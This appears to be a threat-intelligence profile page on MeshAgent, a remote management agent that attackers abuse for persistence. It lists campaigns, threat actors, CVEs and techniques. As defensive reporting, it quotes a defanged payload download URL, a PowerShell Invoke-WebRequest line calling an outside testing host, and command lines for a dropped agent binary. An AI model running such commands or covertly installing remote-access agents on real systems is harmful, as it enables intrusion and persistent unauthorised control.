MeshAgent is an open-source remote access and remote monitoring/management (RMM) agent that is repeatedly described in the provided reporting as a dual-use tool abused by threat actors to obtain persistent remote control of compromised systems. Across the cited incidents, it is used as a secondary payload or persistence mechanism after phishing, fake software-update lures, malicious LNK files, PowerShell downloaders, MSI/EXE installers, ClickFix-style delivery, and fake CAPTCHA-gated download pages. Reported installation methods include silent deployment, Tactical RMM-driven installation, and delivery from phishing sites or compromised infrastructure, including MeshCentral servers.
The content links MeshAgent to multiple threat clusters and campaigns, including Kimsuky-associated phishing activity reported by AhnLab, UNC5687 phishing campaigns, PhantomCore operations, Russian actor activity reported by CERT-UA/Microsoft, ShadowSyndicate-associated tooling, Thor, and broader state-sponsored targeting of the defense sector. It is also referenced in campaigns using EV-signed malware impersonating Microsoft Teams, Zoom, Adobe Reader, and Google Meet, where attackers installed ScreenConnect, Tactical RMM, and MeshAgent to maintain redundant access and support lateral movement.
Capabilities directly described in the content include persistent remote access and remote management of infected systems. In some campaigns, other malware downloaded MeshAgent configuration files, or dropped MeshAgent as part of a broader intrusion set that also performed credential theft, browser and mail account theft, cookie theft, keylogging, clipboard theft, host reconnaissance, and file collection. On Android, reporting states MeshAgent was used in attacks mimicking battlefield management platforms to enable remote management and support cookie theft. In ransomware and post-compromise contexts, MeshAgent appears alongside other dual-use administration tools such as ScreenConnect, SimpleHelp, Tactical RMM, Netscan, Netexec, and modified Rustdesk.
High-confidence indicators and infrastructure details in the content include phishing domains with fake CAPTCHAs used to deliver MeshAgent samples and corresponding MeshCentral servers in PhantomCore activity; a PowerShell downloader tied to UNC5687 that decrypted the URL hxxps://filedn[.]eu/lODWTgN8sswHA6Pn8HXWe1J/tox2/Scan_docs%2398097960[.]msi to fetch a MeshAgent payload; and reporting that UNC5687-associated MeshAgent communicated with C2 domains linked to a service called AnonVNC. The content consistently characterizes MeshAgent as legitimate software repurposed by attackers for persistence, privileged remote access, and follow-on intrusion activity in enterprise, government, financial, and defense-related environments.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2025-31161 is a 9.8 CVSS critical severity vulnerability that affects how the CrushFTP file transfer application handles user authentication... CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability in the S3 authorization header processing that allows authentication bypass.
CVE-2025-30406 is a 9.0 critical severity vulnerability pertaining to hardcoded keys set by default in the CentreStack and Triofox configuration files. This weakness can be leveraged to abuse the ASPX ViewState ... with ViewState deserialization ... Exploitation leads to remote code execution.
To achieve persistence, attackers added new malicious users, utilized remote monitoring and management (RMM) tools such as MeshAgent...
7 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Post lazarusholic lazarusholic.bsky.social ... "‘보안 메일’도 안심 금물! 카드사 사칭 악성 파일 유포 중" published by Ahnlab. #Kimsuky, #LNK, #MeshAgent, #DPRK, #CTI
PhantomCore registers phishing domains with fake CAPTCHAs used to deliver MeshAgent samples, and domains for the corresponding MeshCentral servers.
Remote Access: An instance of MeshAgent is silently installed, providing the attackers with persistent remote control over the infected system.
"To maintain persistence, they abused remote monitoring and management (RMM) tools, specifically SimpleHelp and MeshAgent."
ShadowSyndicate continues to be associated with toolkits including ... MeshAgent ...
25 distinct techniques documented for this family, organized by ATT&CK tactic.
T1583 Acquire Infrastructure QuadSwitcher acquired infrastructure to host their tooling.
PhantomCore registers phishing domains with fake CAPTCHAs used to deliver MeshAgent samples, and domains for the corresponding MeshCentral servers
PhantomCore gains access to servers of legitimate sites and later uses them to store samples of MeshAgent, PhantomTaskShell, and Rsocx
PhantomCore buys commercial software XenArmor All‑In‑One Password Recovery Pro and uploads the free utilities MeshAgent, RSocx, and Rclone
PhantomCore uses external services for remote access: SSH (tunneling) and MeshAgent
In one intrusion, persistence was reinforced through a scheduled task named MeshUserTask, while MeshAgent activity appeared alongside cloudflared, SSH tunneling, and Anubis ransomware deployment across Windows and Linux systems.
The earliest known indicators of compromise... This was a test of reliable code execution: powershell.exe Invoke-WebRequest -Uri http://REDACTED.oastify.com/REDACTED
C:\Windows\Temp\mesch.exe run ... C:\Windows\Temp\mesch.exe b64exec ... C:\Windows\Temp\mesch.exe -fullinstall
In one intrusion, persistence was reinforced through a scheduled task named MeshUserTask, while MeshAgent activity appeared alongside cloudflared, SSH tunneling, and Anubis ransomware deployment across Windows and Linux systems.
T1071 Application Layer Protocol In Play intrusions, payloads are retrieved via HTTP.
It installs as a Windows service, connects over WebSocket TLS on port 443, and waits for commands.
Available evidence shows that, in several instances, threat actors installed the software through the s3browser-13-1-1.exe installer, after downloading the installer to the user Downloads directory.
39 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
26 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
MeshAgent is referenced as a named tool/malware in an AhnLab post about malicious file distribution impersonating a card company, with Kimsuky-related tagging.
Referenced as a remote management tool whose configuration files are downloaded by another malicious component during the intrusion.
RMM agent used as an attacker-installed backdoor for persistence and remote control.
An RMM agent component (commonly associated with MeshCentral-style deployments) leveraged for persistent remote access and management of compromised hosts.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.